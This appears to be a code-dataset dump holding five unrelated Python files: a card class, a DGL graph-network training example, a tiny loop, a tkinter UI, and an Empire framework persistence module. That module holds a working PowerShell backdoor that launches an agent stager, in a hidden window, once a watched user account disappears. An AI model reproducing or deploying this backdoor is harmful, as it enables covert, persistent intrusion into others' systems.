hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
72b3507469d3268751b2af14a56a3c99059f5d73 | 1,307 | py | Python | deck_of_cards/core.py | ucsky/deck_of_cards | 81422a35857645f434e231e42c78bd5f44f7e0e1 | [
"Apache-2.0"
] | null | null | null | deck_of_cards/core.py | ucsky/deck_of_cards | 81422a35857645f434e231e42c78bd5f44f7e0e1 | [
"Apache-2.0"
] | null | null | null | deck_of_cards/core.py | ucsky/deck_of_cards | 81422a35857645f434e231e42c78bd5f44f7e0e1 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: 00_core.ipynb (unless otherwise specified).
from __future__ import print_function, division
__all__ = ['Card']
# Cell
#nbdev_comment from __future__ import print_function, division
import random
class Card:
"""Represents a standard playing card.
Attributes:
suit: integer 0-3
rank: integer 1-13
"""
suit_names = ["Clubs", "Diamonds", "Hearts", "Spades"]
rank_names = [None, "Ace", "2", "3", "4", "5", "6", "7",
"8", "9", "10", "Jack", "Queen", "King"]
def __init__(self, suit=0, rank=2):
self.suit = suit
self.rank = rank
def __str__(self):
"""Returns a human-readable string representation."""
return '%s of %s' % (Card.rank_names[self.rank],
Card.suit_names[self.suit])
def __eq__(self, other) -> bool:
"""Checks whether self and other have the same rank and suit.
"""
return self.suit == other.suit and self.rank == other.rank
def __lt__(self, other) -> bool:
"""Compares this card to other, first by suit, then rank.
"""
t1 = self.suit, self.rank
t2 = other.suit, other.rank
return t1 < t2
def __repr__(self): return self.__str__()
def foo(): pass
| 25.627451 | 87 | 0.58684 |
114c7c24830f29f02cf0b618677a8c2bd20a28a2 | 11,452 | py | Python | examples/pytorch/sampling/gcn_cv_sc.py | sufeidechabei/dgl-1 | 23f78c0539bdda55722d425be90ac460fa9a6983 | [
"Apache-2.0"
] | null | null | null | examples/pytorch/sampling/gcn_cv_sc.py | sufeidechabei/dgl-1 | 23f78c0539bdda55722d425be90ac460fa9a6983 | [
"Apache-2.0"
] | null | null | null | examples/pytorch/sampling/gcn_cv_sc.py | sufeidechabei/dgl-1 | 23f78c0539bdda55722d425be90ac460fa9a6983 | [
"Apache-2.0"
] | null | null | null | import argparse, time, math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import dgl
import dgl.function as fn
from dgl import DGLGraph
from dgl.data import register_data_args, load_data
class NodeUpdate(nn.Module):
def __init__(self, layer_id, in_feats, out_feats, dropout, activation=None, test=False, concat=False):
super(NodeUpdate, self).__init__()
self.layer_id = layer_id
self.linear = nn.Linear(in_feats, out_feats)
self.dropout = None
if dropout != 0:
self.dropout = nn.Dropout(p=dropout)
self.activation = activation
self.concat = concat
self.test = test
def forward(self, node):
h = node.data['h']
if self.test:
norm = node.data['norm']
h = h * norm
else:
agg_history_str = 'agg_h_{}'.format(self.layer_id-1)
agg_history = node.data[agg_history_str]
# control variate
h = h + agg_history
if self.dropout:
h = self.dropout(h)
h = self.linear(h)
if self.concat:
h = torch.cat((h, self.activation(h)), dim=1)
elif self.activation:
h = self.activation(h)
return {'activation': h}
class GCNSampling(nn.Module):
def __init__(self,
in_feats,
n_hidden,
n_classes,
n_layers,
activation,
dropout):
super(GCNSampling, self).__init__()
self.n_layers = n_layers
self.dropout = None
if dropout != 0:
self.dropout = nn.Dropout(p=dropout)
self.activation = activation
# input layer
self.linear = nn.Linear(in_feats, n_hidden)
self.layers = nn.ModuleList()
# hidden layers
for i in range(1, n_layers):
skip_start = (i == n_layers-1)
self.layers.append(NodeUpdate(i, n_hidden, n_hidden, dropout, activation, concat=skip_start))
# output layer
self.layers.append(NodeUpdate(n_layers, 2*n_hidden, n_classes, dropout))
def forward(self, nf):
h = nf.layers[0].data['preprocess']
if self.dropout:
h = self.dropout(h)
h = self.linear(h)
skip_start = (0 == self.n_layers-1)
if skip_start:
h = torch.cat((h, self.activation(h)), dim=1)
else:
h = self.activation(h)
for i, layer in enumerate(self.layers):
new_history = h.clone().detach()
history_str = 'h_{}'.format(i)
history = nf.layers[i].data[history_str]
h = h - history
nf.layers[i].data['h'] = h
nf.block_compute(i,
fn.copy_src(src='h', out='m'),
lambda node : {'h': node.mailbox['m'].mean(dim=1)},
layer)
h = nf.layers[i+1].data.pop('activation')
# update history
if i < nf.num_layers-1:
nf.layers[i].data[history_str] = new_history
return h
class GCNInfer(nn.Module):
def __init__(self,
in_feats,
n_hidden,
n_classes,
n_layers,
activation):
super(GCNInfer, self).__init__()
self.n_layers = n_layers
self.activation = activation
# input layer
self.linear = nn.Linear(in_feats, n_hidden)
self.layers = nn.ModuleList()
# hidden layers
for i in range(1, n_layers):
skip_start = (i == n_layers-1)
self.layers.append(NodeUpdate(i, n_hidden, n_hidden, 0, activation, True, concat=skip_start))
# output layer
self.layers.append(NodeUpdate(n_layers, 2*n_hidden, n_classes, 0, None, True))
def forward(self, nf):
h = nf.layers[0].data['preprocess']
h = self.linear(h)
skip_start = (0 == self.n_layers-1)
if skip_start:
h = torch.cat((h, self.activation(h)), dim=1)
else:
h = self.activation(h)
for i, layer in enumerate(self.layers):
nf.layers[i].data['h'] = h
nf.block_compute(i,
fn.copy_src(src='h', out='m'),
fn.sum(msg='m', out='h'),
layer)
h = nf.layers[i+1].data.pop('activation')
return h
def main(args):
# load and preprocess dataset
data = load_data(args)
if args.self_loop and not args.dataset.startswith('reddit'):
data.graph.add_edges_from([(i,i) for i in range(len(data.graph))])
train_nid = np.nonzero(data.train_mask)[0].astype(np.int64)
test_nid = np.nonzero(data.test_mask)[0].astype(np.int64)
features = torch.FloatTensor(data.features)
labels = torch.LongTensor(data.labels)
train_mask = torch.ByteTensor(data.train_mask)
val_mask = torch.ByteTensor(data.val_mask)
test_mask = torch.ByteTensor(data.test_mask)
in_feats = features.shape[1]
n_classes = data.num_labels
n_edges = data.graph.number_of_edges()
n_train_samples = train_mask.sum().item()
n_val_samples = val_mask.sum().item()
n_test_samples = test_mask.sum().item()
print("""----Data statistics------'
#Edges %d
#Classes %d
#Train samples %d
#Val samples %d
#Test samples %d""" %
(n_edges, n_classes,
n_train_samples,
n_val_samples,
n_test_samples))
# create GCN model
g = DGLGraph(data.graph, readonly=True)
norm = 1. / g.in_degrees().float().unsqueeze(1)
if args.gpu < 0:
cuda = False
else:
cuda = True
torch.cuda.set_device(args.gpu)
features = features.cuda()
labels = labels.cuda()
train_mask = train_mask.cuda()
val_mask = val_mask.cuda()
test_mask = test_mask.cuda()
norm = norm.cuda()
g.ndata['features'] = features
num_neighbors = args.num_neighbors
n_layers = args.n_layers
g.ndata['norm'] = norm
g.update_all(fn.copy_src(src='features', out='m'),
fn.sum(msg='m', out='preprocess'),
lambda node : {'preprocess': node.data['preprocess'] * node.data['norm']})
for i in range(n_layers):
g.ndata['h_{}'.format(i)] = torch.zeros(features.shape[0], args.n_hidden).to(device=features.device)
g.ndata['h_{}'.format(n_layers-1)] = torch.zeros(features.shape[0], 2*args.n_hidden).to(device=features.device)
model = GCNSampling(in_feats,
args.n_hidden,
n_classes,
n_layers,
F.relu,
args.dropout)
loss_fcn = nn.CrossEntropyLoss()
infer_model = GCNInfer(in_feats,
args.n_hidden,
n_classes,
n_layers,
F.relu)
if cuda:
model.cuda()
infer_model.cuda()
# use optimizer
optimizer = torch.optim.Adam(model.parameters(),
lr=args.lr,
weight_decay=args.weight_decay)
for epoch in range(args.n_epochs):
for nf in dgl.contrib.sampling.NeighborSampler(g, args.batch_size,
num_neighbors,
neighbor_type='in',
shuffle=True,
num_hops=n_layers,
seed_nodes=train_nid):
for i in range(n_layers):
agg_history_str = 'agg_h_{}'.format(i)
g.pull(nf.layer_parent_nid(i+1).long(), fn.copy_src(src='h_{}'.format(i), out='m'),
fn.sum(msg='m', out=agg_history_str),
lambda node : {agg_history_str: node.data[agg_history_str] * node.data['norm']})
node_embed_names = [['preprocess', 'h_0']]
for i in range(1, n_layers):
node_embed_names.append(['h_{}'.format(i), 'agg_h_{}'.format(i-1)])
node_embed_names.append(['agg_h_{}'.format(n_layers-1)])
nf.copy_from_parent(node_embed_names=node_embed_names)
model.train()
# forward
pred = model(nf)
batch_nids = nf.layer_parent_nid(-1).to(device=pred.device).long()
batch_labels = labels[batch_nids]
loss = loss_fcn(pred, batch_labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
node_embed_names = [['h_{}'.format(i)] for i in range(n_layers)]
node_embed_names.append([])
nf.copy_to_parent(node_embed_names=node_embed_names)
for infer_param, param in zip(infer_model.parameters(), model.parameters()):
infer_param.data.copy_(param.data)
num_acc = 0.
for nf in dgl.contrib.sampling.NeighborSampler(g, args.test_batch_size,
g.number_of_nodes(),
neighbor_type='in',
num_hops=n_layers,
seed_nodes=test_nid):
node_embed_names = [['preprocess']]
for i in range(n_layers):
node_embed_names.append(['norm'])
nf.copy_from_parent(node_embed_names=node_embed_names)
infer_model.eval()
with torch.no_grad():
pred = infer_model(nf)
batch_nids = nf.layer_parent_nid(-1).to(device=pred.device).long()
batch_labels = labels[batch_nids]
num_acc += (pred.argmax(dim=1) == batch_labels).sum().cpu().item()
print("Test Accuracy {:.4f}". format(num_acc/n_test_samples))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='GCN')
register_data_args(parser)
parser.add_argument("--dropout", type=float, default=0.5,
help="dropout probability")
parser.add_argument("--gpu", type=int, default=-1,
help="gpu")
parser.add_argument("--lr", type=float, default=3e-2,
help="learning rate")
parser.add_argument("--n-epochs", type=int, default=200,
help="number of training epochs")
parser.add_argument("--batch-size", type=int, default=1000,
help="train batch size")
parser.add_argument("--test-batch-size", type=int, default=1000,
help="test batch size")
parser.add_argument("--num-neighbors", type=int, default=2,
help="number of neighbors to be sampled")
parser.add_argument("--n-hidden", type=int, default=16,
help="number of hidden gcn units")
parser.add_argument("--n-layers", type=int, default=1,
help="number of hidden gcn layers")
parser.add_argument("--self-loop", action='store_true',
help="graph self-loop (default=False)")
parser.add_argument("--weight-decay", type=float, default=5e-4,
help="Weight for L2 loss")
args = parser.parse_args()
print(args)
main(args)
| 35.345679 | 115 | 0.541303 |
037e685fe70b3653c2c5f34ef28259bf1a3421d1 | 6,473 | py | Python | lib/modules/persistence/powerbreach/deaduser.py | dascannibal/Empire | 293f06437520f4747e82e4486938b1a9074d3d51 | [
"BSD-3-Clause"
] | 10 | 2016-01-26T19:58:49.000Z | 2021-06-20T17:57:43.000Z | lib/modules/persistence/powerbreach/deaduser.py | dascannibal/Empire | 293f06437520f4747e82e4486938b1a9074d3d51 | [
"BSD-3-Clause"
] | null | null | null | lib/modules/persistence/powerbreach/deaduser.py | dascannibal/Empire | 293f06437520f4747e82e4486938b1a9074d3d51 | [
"BSD-3-Clause"
] | 5 | 2017-10-17T08:16:13.000Z | 2021-04-30T02:41:02.000Z | import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-DeadUserBackdoor',
'Author': ['@sixdub'],
'Description': ('Backup backdoor for a backdoor user.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': [
'http://sixdub.net'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description' : 'Output the backdoor to a file instead of tasking to an agent.',
'Required' : False,
'Value' : ''
},
'Timeout' : {
'Description' : 'Time (in seconds) to run the backdoor. Defaults to 0 (run forever).',
'Required' : True,
'Value' : '0'
},
'Sleep' : {
'Description' : 'Time (in seconds) to sleep between checks.',
'Required' : True,
'Value' : '30'
},
'Username' : {
'Description' : 'User account to check for existence.',
'Required' : True,
'Value' : ''
},
'Domain' : {
'Description' : 'Switch. Check the current domain for the user account.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
script = """
function Invoke-DeadUserBackdoor
{
Param(
[Parameter(Mandatory=$False,Position=1)]
[int]$Timeout=0,
[Parameter(Mandatory=$False,Position=2)]
[int] $Sleep=30,
[Parameter(Mandatory=$True,Position=3)]
[string] $Username,
[Parameter(Mandatory=$False,Position=4)]
[switch] $Domain
)
$running=$True
$match =""
$starttime = Get-Date
while($running)
{
if ($Timeout -ne 0 -and ($([DateTime]::Now) -gt $starttime.addseconds($Timeout)))
{
$running=$False
}
if($Domain)
{
$UserSearcher = [adsisearcher]"(&(samAccountType=805306368)(samAccountName=*$UserName*))"
$UserSearcher.PageSize = 1000
$count = @($UserSearcher.FindAll()).Count
if($count -eq 0)
{
Write-Verbose "Domain user $Username not found!"
$match=$True
}
}
else
{
$comp = $env:computername
[ADSI]$server="WinNT://$comp"
$usercheck = $server.children | where{$_.schemaclassname -eq "user" -and $_.name -eq $Username}
if(-not $usercheck)
{
$match=$True
}
}
if($match)
{
REPLACE_LAUNCHER
$running=$False
}
else
{
Start-Sleep -s $Sleep
}
}
}
Invoke-DeadUserBackdoor"""
listenerName = self.options['Listener']['Value']
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["launcher"]
stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False"
# and generate the code
stagerCode = stager.generate()
if stagerCode == "":
return ""
else:
script = script.replace("REPLACE_LAUNCHER", stagerCode)
script = script.encode('ascii', 'ignore')
for option,values in self.options.iteritems():
if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
outFile = self.options['OutFile']['Value']
if outFile != '':
# make the base directory if it doesn't exist
if not os.path.exists(os.path.dirname(outFile)) and os.path.dirname(outFile) != '':
os.makedirs(os.path.dirname(outFile))
f = open(outFile, 'w')
f.write(script)
f.close()
print helpers.color("[+] PowerBreach deaduser backdoor written to " + outFile)
return ""
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
launcher = helpers.powershell_launcher(script)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ")
# set up the start-process command so no new windows appears
scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-DeadUserBackdoor started'" % (parts[0], " ".join(parts[1:]))
return scriptLauncher
| 33.194872 | 168 | 0.48262 |
9d822d9c2b3fe9614729c55d6d1d0045041fb1cb | 100 | py | Python | punto_4.py | mbeltra89001/algoritmos | fef4ec9a2bd9fc6fb1cbd554287136c30445637e | [
"MIT"
] | null | null | null | punto_4.py | mbeltra89001/algoritmos | fef4ec9a2bd9fc6fb1cbd554287136c30445637e | [
"MIT"
] | null | null | null | punto_4.py | mbeltra89001/algoritmos | fef4ec9a2bd9fc6fb1cbd554287136c30445637e | [
"MIT"
] | null | null | null | lista=[]
for i in range (1,13):
t=5*i+1
lista.append(t)
print(lista)
suma=sum(lista)
print(suma) | 14.285714 | 22 | 0.66 |
a2bb2a391751fcf5e7006ac7c504a833b1260fb8 | 30,047 | py | Python | UI/ui.py | PedroKBarros/LE3B | be9740be96871b24ca40ed82109469cdd7204115 | [
"MIT"
] | null | null | null | UI/ui.py | PedroKBarros/LE3B | be9740be96871b24ca40ed82109469cdd7204115 | [
"MIT"
] | 3 | 2021-08-23T20:56:29.000Z | 2021-08-25T16:27:04.000Z | UI/ui.py | PedroKBarros/LE3B | be9740be96871b24ca40ed82109469cdd7204115 | [
"MIT"
] | null | null | null | from tkinter import *
from tkinter.filedialog import askopenfilename
from tkinter import messagebox
from PIL import Image, ImageTk
import UI.ui_constants as ui_consts
import main as main
import os.path
from os import path
from collections import deque
from random import randint
root = None
currentCommentsUIRow = 0
commentsFrame = None
lblStatusBar = None
etrCurrentTime = None
lblTotalTime = None
lblCurrentTimeBar = None
lastWidgetFocusIn = None
btnPlayPause = None
UICommentsQueue = deque()
cnvComments = None
scrbarCanvasComment = None
CkbScrollbarAutoMoveVar = None
def buildUI(root):
load_image = Image.open("UI/icon.png")
#load_image = load_image.resize((90, 90), Image.ANTIALIAS)
render_image = ImageTk.PhotoImage(load_image)
root.iconphoto(True, render_image)
root.geometry('338x531')
root.resizable(False, False)
root.title(main.getSoftwareName() + " " + main.getSoftwareVersion())
root["bg"] = ui_consts.DEFAULT_BG_COLOR
labelFont = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE2)
entryFont = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE1)
buttonFont = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE2)
defaultFgColor = ui_consts.DEFAULT_FG_COLOR
defaultBgColor = ui_consts.DEFAULT_BG_COLOR
#fileContainer1 = Frame(master)
#fileContainer1["bg"] = defaultBgColor
#fileContainer1.pack()
#fileContainer1["padx"] = ui_consts.FILE_CONTAINER1_PADX
#fileContainer1["pady"] = ui_consts.FILE_CONTAINER1_PADY
#fileContainer2 = Frame(master)
#fileContainer2["bg"] = defaultBgColor
#fileContainer2.pack()
#fileContainer2["padx"] = ui_consts.FILE_CONTAINER2_PADX
#fileContainer2["pady"] = ui_consts.FILE_CONTAINER2_PADY
#controlsContainer3 = Frame(master)
#controlsContainer3["bg"] = ui_consts.CONTROLS_BG_COLOR
#controlsContainer3.pack()
#controlsContainer3["padx"] = 170
#controlsContainer3["pady"] = 2
#controlsContainer3.grid(row=3, column=0)
label1 = Label(root)
label1["bg"] = defaultBgColor
label1["text"] = ui_consts.LABEL1_TEXT
label1["fg"] = defaultFgColor
label1["font"] = labelFont
label1.place(x=15, y=0)
entry1 = Entry(root)
entry1["width"] = 36
entry1["font"] = entryFont
entry1["state"] = "readonly" #O estado pode ser disable, normal ou readonly.
#Para escrita por código ou pelo usuário, é necessário ser "normal"
entry1.place(x=15, y=20)
load_image1 = Image.open(ui_consts.IMAGE_PATH_BTN_OPEN_LEAVE)
load_image1 = load_image1.resize((50, 50), Image.ANTIALIAS) #Alterando as dimensões da imagem
render_image1 = ImageTk.PhotoImage(load_image1)
button1 = Button(root, image=render_image1)
button1.image = render_image1
button1["bd"] = 0 #Para definir a borda, tornando-a mínima
button1["highlightthickness"] = 0 #Para definir a espessura de destaque, retirando de fato a borda
#Mouse Leave e Enter:
imgData1 = (ui_consts.IMAGE_PATH_BTN_OPEN_ENTER, (50, 50), None, None)
imgData2 = (ui_consts.IMAGE_PATH_BTN_OPEN_LEAVE, (50, 50), None, None)
button1.bind("<Enter>", lambda event, wgControl=button1, borderSize=0,
borderColor="white", imgData1=imgData1:
handleEventMouseEnter(event, wgControl, borderSize, borderColor, imgData1))
button1.bind("<Leave>", lambda event, wgControl=button1, borderSize=0,
borderColor="white", imgData1=imgData2:
handleEventMouseLeave(event, wgControl, borderSize, borderColor, imgData1))
button1.bind("<Button-1>", lambda event, wgControl=button1, borderSize=0,
borderColor="white", function=loadCommentsByTxtFile:
handleEventMouseLeftClick(event, wgControl, borderSize, borderColor, None, None, function(entry1)))
button1.place(x=135, y=50)
load_image2 = Image.open(ui_consts.IMAGE_PATH_CONTROLS_BAR)
load_image2 = load_image2.resize((318, 50), Image.ANTIALIAS) #Alterando as dimensões da imagem
render_image2 = ImageTk.PhotoImage(load_image2)
label2 = Label(root, image=render_image2)
label2.image = render_image2
label2.place(x=0, y=110)
load_image3 = Image.open(ui_consts.IMAGE_PATH_BTN_PLAY_LEAVE)
load_image3 = load_image3.resize((22, 22), Image.ANTIALIAS) #Alterando as dimensões da imagem
render_image3 = ImageTk.PhotoImage(load_image3)
global btnPlayPause
btnPlayPause = Button(root, image=render_image3)
btnPlayPause.image = render_image3
btnPlayPause["bd"] = 0 #Para definir a borda, tornando-a mínima
btnPlayPause["highlightthickness"] = 0 #Para definir a espessura de destaque, retirando de fato a borda
#Mouse Leave e Enter:
imgData1 = (ui_consts.IMAGE_PATH_BTN_PLAY_ENTER, (22, 22), main.isTimeStatePlay, False)
imgData2 = (ui_consts.IMAGE_PATH_BTN_PLAY_LEAVE, (22, 22), main.isTimeStatePlay, False)
imgData3 = (ui_consts.IMAGE_PATH_BTN_PAUSE_ENTER, (22, 22), main.isTimeStatePlay, True)
imgData4 = (ui_consts.IMAGE_PATH_BTN_PAUSE_LEAVE, (22, 22), main.isTimeStatePlay, True)
#Button-1:
imgData6 = (ui_consts.IMAGE_PATH_BTN_PAUSE_ENTER, (22, 22), main.isTimeStatePlay, False)
imgData7 = (ui_consts.IMAGE_PATH_BTN_PLAY_ENTER, (22, 22), main.isTimeStatePlay, True)
btnPlayPause.bind("<Enter>", lambda event, wgControl=btnPlayPause, borderSize=0, borderColor="white",
imgData1=imgData1, imgData2=imgData3: handleEventMouseEnter(event, wgControl, borderSize,
borderColor, imgData1, imgData2))
btnPlayPause.bind("<Leave>", lambda event, wgControl=btnPlayPause, borderSize=0, borderColor="white",
imgData1=imgData2, imgData2=imgData4: handleEventMouseLeave(event, wgControl, borderSize,
borderColor, imgData1, imgData2))
btnPlayPause.bind("<Button-1>", lambda event, wgControl=btnPlayPause, borderSize=0,
borderColor="white", imgData1=imgData6, imgData2=imgData7,
function = handleEventPlayPauseButtonMouseLeftClick, execConditionFunc=main.isEndTime, execConditionValue=False:
handleEventMouseLeftClick(event, wgControl, borderSize, borderColor,
imgData1, imgData2, function, execConditionFunc, execConditionValue))
btnPlayPause.place(x=7, y=117)
load_image4 = Image.open(ui_consts.IMAGE_PATH_TIME_BAR)
load_image4 = load_image4.resize(ui_consts.IMAGE_PATH_TIME_BAR_SIZE_MIN, Image.ANTIALIAS) #Alterando as dimensões da imagem
render_image4 = ImageTk.PhotoImage(load_image4)
label3 = Label(root, image=render_image4)
label3.image = render_image4
label3["bd"] = 0
label3["highlightthickness"] = 0
#Mouse Leave e Enter:
imgData1 = (ui_consts.IMAGE_PATH_TIME_BAR, ui_consts.IMAGE_PATH_TIME_BAR_SIZE_MAX, None, None)
imgData2 = (ui_consts.IMAGE_PATH_TIME_BAR, ui_consts.IMAGE_PATH_TIME_BAR_SIZE_MIN, None, None)
label3.bind("<Enter>", lambda event, wgControl=label3, borderSize=0,
borderColor="white", imgData1=imgData1:
handleEventMouseEnter(event, wgControl, borderSize, borderColor, imgData1))
label3.bind("<Leave>", lambda event, wgControl=label3, borderSize=0,
borderColor="white", imgData1=imgData2:
handleEventMouseLeave(event, wgControl, borderSize, borderColor, imgData1))
label3.place(x=10, y=145)
global lblTotalTime
lblTotalTime = Label(root)
lblTotalTime["bg"] = ui_consts.SECOND_BG_COLOR
lblTotalTime["text"] = ui_consts.LABEL4_INITIAL_TEXT
lblTotalTime["fg"] = ui_consts.SECOND_FG_COLOR
lblTotalTime["font"] = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE1)
lblTotalTime.place(x=140, y=118)
global etrCurrentTime
var = StringVar()
var.trace("w", lambda name, index,mode, var=var: handleEtrCurrentTimeChange(var))
#Com a variável var e o método trace, é possível associar uma função de callback toda vez
# que o valor da etrCurrentTime for modificado.
etrCurrentTime = Entry(root, textvariable=var, name=ui_consts.ETR_CURRENT_TIME_NAME) #Colocado o nome para que possamos saber se o evento FocusIn foi disparado por esse widget
etrCurrentTime["width"] = 8
etrCurrentTime["bg"] = ui_consts.SECOND_BG_COLOR
etrCurrentTime["fg"] = ui_consts.SECOND_FG_COLOR
etrCurrentTime["font"] = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE1)
etrCurrentTime["state"] = "normal"
etrCurrentTime.bind("<Enter>", lambda event, wgControl=etrCurrentTime, borderSize=0.5,
borderColor=ui_consts.SECOND_BC_HIGHLIGHT_COLOR:
handleEventMouseEnter(event, wgControl, borderSize, borderColor))
etrCurrentTime.bind("<Leave>", lambda event, wgControl=etrCurrentTime, borderSize=0:
handleEventMouseLeave(event, wgControl, borderSize))
imgData1 = (ui_consts.IMAGE_PATH_BTN_PLAY_LEAVE, (22, 22), main.isTimeStatePlay, True)
etrCurrentTime.bind("<FocusIn>", lambda event, wgControl=btnPlayPause, borderSize=0,
borderColor="white", imgData1=imgData1:
handleEventFocusIn(event, wgControl, borderSize, borderColor, imgData1, None,
function=configPauseTime))
#Obs1.: Utilizei configPauseTime() ao invés de handleEventButtonPlayPauseLeftClick(),
# pois essa última passa o foco para o botão play pause, retirando o foco da etrCurrentTime.
# Além disso, ela chama a main.timeManagement(), o que não é necessáriod
#Obs2.: É necessário o evento FocusIn, apesar de termos o trace com a StringVar, pois a
# handleEventFocusIn seta a variável lastWidgetFocusIn com o widget
# que pertence ao evento.
etrCurrentTime.place(x=72, y=119)
printEntry(etrCurrentTime, "00:00:00", CENTER)
defaultOptionMenuValue = StringVar()
defaultOptionMenuValue.set(ui_consts.DEFAULT_OPTION_MENU1_VALUE)
optionMenu1 = OptionMenu(root, defaultOptionMenuValue, *ui_consts.OPTION_MENU1_VALUES, command=handleOptionMenuSelectChange)
optionMenu1["font"] = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE1)
optionMenu1["bg"] = ui_consts.CONTROLS_BG_COLOR
optionMenu1["fg"] = ui_consts.SECOND_FG_COLOR
optionMenu1["bd"] = 0
optionMenu1["direction"] = "above"
optionMenu1["highlightthickness"] = 0
optionMenu1["relief"] = GROOVE
optionMenu1["width"] = 4
optionMenu1["height"] = 1
optionMenu1.place(x=247, y=117)
load_image5 = Image.open(ui_consts.IMAGE_PATH_CURRENT_TIME_BAR)
load_image5 = load_image5.resize((1, 4), Image.ANTIALIAS) #Alterando as dimensões da imagem
render_image5 = ImageTk.PhotoImage(load_image5)
global lblCurrentTimeBar
lblCurrentTimeBar = Label(root, image=render_image5)
lblCurrentTimeBar.image = render_image5
lblCurrentTimeBar["bd"] = 0
lblCurrentTimeBar["highlightthickness"] = 0
lblCurrentTimeBar.place(x=10, y=145)
#UI responsável pela apresentação dos comentários:
global cnvComments
cnvComments = Canvas(root)
cnvComments["width"] = 318
cnvComments["height"] = 320
cnvComments["highlightthickness"] = 0
cnvComments["bg"] = ui_consts.DEFAULT_BG_COLOR
cnvComments.place(x=2, y=163)
global commentsFrame
global scrbarCanvasComment
commentsFrame = Frame(cnvComments, background = "#FFFFFF")
scrbarCanvasComment = Scrollbar(root, orient = "vertical", command = cnvComments.yview)
cnvComments.configure(yscrollcommand = scrbarCanvasComment.set)
scrbarCanvasComment.pack(side="right", fill="y")
cnvComments.create_window((4,4), window=commentsFrame, anchor="nw")
commentsFrame.bind("<Configure>", lambda event, canvas=cnvComments: onFrameConfigure(canvas))
global CkbScrollbarAutoMoveVar
CkbScrollbarAutoMoveVar = IntVar()
CkbScrollbarAutoMove = Checkbutton(root, variable=CkbScrollbarAutoMoveVar, command=handleCkbScrollbarAutoMove)
CkbScrollbarAutoMove["text"] = "Mover automaticamente para Comentário"
CkbScrollbarAutoMove["font"] = entryFont
CkbScrollbarAutoMove["bg"] = ui_consts.DEFAULT_BG_COLOR
CkbScrollbarAutoMove.place(x=0, y=480)
global lblStatusBar
lblStatusBar = Label(root)
lblStatusBar["bg"] = ui_consts.CONTROLS_BG_COLOR
lblStatusBar["width"] = 45
lblStatusBar["fg"] = ui_consts.SECOND_FG_COLOR
lblStatusBar["anchor"] = W
lblStatusBar.place(x=0, y=510)
def onFrameConfigure(canvas):
'''Reset the scroll region to encompass the inner frame'''
canvas.configure(scrollregion=canvas.bbox("all"))
def handleEventMouseEnter(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
function = None, execConditionFunc = None, execConditionValue = None):
#Estrutura de uma imgData: (caminho da imagem, (width, height), função condição, valor condição)
handleEvent(event, wgControl, borderSize, borderColor, imgData1, imgData2, function, execConditionFunc, execConditionValue)
print("MOUSE ENTER!")
def handleEventFocusIn(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
function = None, execConditionFunc = None, execConditionValue = None):
#Estrutura de uma imgData: (caminho da imagem, (width, height), função condição, valor condição)
global lastWidgetFocusIn
lastWidgetFocusIn = str(event.widget)
handleEvent(event, wgControl, borderSize, borderColor, imgData1, imgData2, function, execConditionFunc, execConditionValue)
print("FOCUS IN!")
